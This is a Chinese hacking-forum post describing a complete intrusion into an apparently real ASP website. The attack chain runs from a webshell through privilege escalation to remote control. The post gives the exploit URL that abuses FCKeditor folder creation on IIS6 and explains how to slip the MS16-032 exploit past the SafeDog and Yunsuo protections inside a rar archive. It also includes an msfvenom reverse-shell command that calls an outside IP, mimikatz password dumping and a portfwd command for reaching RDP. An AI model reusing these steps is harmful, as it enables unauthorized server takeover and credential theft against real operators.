找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2378|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ [; q. U1 U7 p

0 o$ s4 {3 w; y5 t" V- ]+ e" O! {. R$ E0 X: j+ t1 I* v" c5 K# c3 p! M7 E7 G$ c O3 W$ g" h4 A7 q j+ W8 |9 ]: p+ L, S/ O0 x! s1 M/ O: A2 k E
( O2 Y9 P/ d6 |1 r# I( r3 U j5 Y

D5 g3 i* j* }
7 b# @2 O: A& k, L$ F
一、 利用getwebshell
6 ^ m2 g9 e6 [0 H/ {
/ Z( ~+ Z" e4 G4 d6 m
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
1 C% U. A1 }+ e1 s7 ^: o/ B
7 j, Y. Y; t/ [6 W, J3 R 222.png
2 R' m$ H- Q1 U; O' j, z
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 d- |+ z" c9 ~& Y333.png
- Z1 ~$ n* ]! H. `8 q
下面我们构造一个asp目录,如: & G, j- ~* K% D% N, H& M" ~

& n/ ~; u8 j( _) B/ f% u

d! v2 i' M! O5 x( W, Z& H& A& E http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 , [* ^7 @- [3 S0 }8 u$ h/ ?

1 g, Z+ x/ v2 F! Z1 v" P8 w

( R% @7 n( f* G 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
/ g4 D: H, l# Q1 h! x7 T
5 R p1 S; U$ y7 M: c$ `7 s
一、 绕过安全狗云锁提权并且加账号
3 S0 }4 E: m! v' w, ~6 F. X$ _ 444.png
0 i7 Q' W% `5 F: g
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
# g8 C0 m% w. Y3 ^; Y
# [' J W @8 o0 R. ~& V7 s
如图:
1 a7 _, G/ L" X- o8 m% B555.png
& r* A7 p: N. [, a [3 k
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
M3 Y5 C, Q: L% G# n+ A
9 v" i% z/ Z5 o2 b7 R5 u2 W
一、 利用metasploit
6 m3 M$ V- {3 j7 j% ^9 k( W3 X
; o' A) M) s6 u; M
首先用pentestbox生成一个64位的payload如下命令
! J/ ~5 d" R" k
( ~1 ^$ s9 ^! m5 v: F1 k1 i msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
2 a& X# H* C2 Z+ Z
( R) x. I0 @4 n7 H. G$ Q: Z* W+ g
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
' M- p2 E5 f. a0 K. w- u11.png
0 ^& J% i( T9 D( U. F
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
; t+ c- X: A9 g 13.png
8 U# [3 ~ s* t" A) x7 s
下面我们来做一个监听如下命令:
( ?6 ~5 s) X" h0 j' u; i% l
3 u+ |. D: n1 n/ j portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
: f1 T3 ]+ ` e 18.png
* X- I0 |& [: w/ P% B/ O

# c9 U9 q5 j3 t8 d1 E+ g5 V6 o; g
. [6 n1 E8 H: P" I/ q- ]

0 o4 F" B) I* a# F3 p: o

# X) g/ B! [1 T: C
" O' q% }; [( y* |3 g8 h+ T" w7 \/ u
: s! l# z6 [ k7 M
! T* p. X7 J" R$ H* |* Q

& D( K" A7 }8 Z. L9 p/ z
" [. y) B* \, o7 h , @( l" O% m S2 A: J7 X6 J- i

. F. {' P6 X3 |$ R, u
1 z$ K( ? T6 z) V/ I

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表